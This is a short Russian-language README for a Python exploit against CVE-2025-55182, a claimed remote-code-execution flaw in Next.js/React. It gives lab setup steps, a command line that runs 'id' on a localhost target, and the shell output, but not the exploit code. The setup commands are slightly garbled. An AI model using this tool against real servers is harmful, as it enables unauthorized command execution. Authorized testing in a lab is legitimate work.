
Python-эксплойт для CVE-2025-55182 — инъекция JavaScript на стороне сервера в Next.js/React, позволяющая удалённое выполнение кода через некорректные multipart-данные формы. Включает настройку лабораторной среды для авторизованного тестирования.
Скрипт Python 3, который можно использовать для демонстрации CVE-2025-55182. Он эксплуатирует уязвимость инъекции JavaScript на стороне сервера в приложениях Next.js/React, позволяющую удалённое выполнение кода с помощью неправильно сформированных данных multipart-формы.
⚠️ Только для образовательных целей и авторизованного тестирования.
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start
pip install requests
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
-u Целевой домен или IP с протоколом - http://localhost:3000 -c Команда для выполнения на сервере - id
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)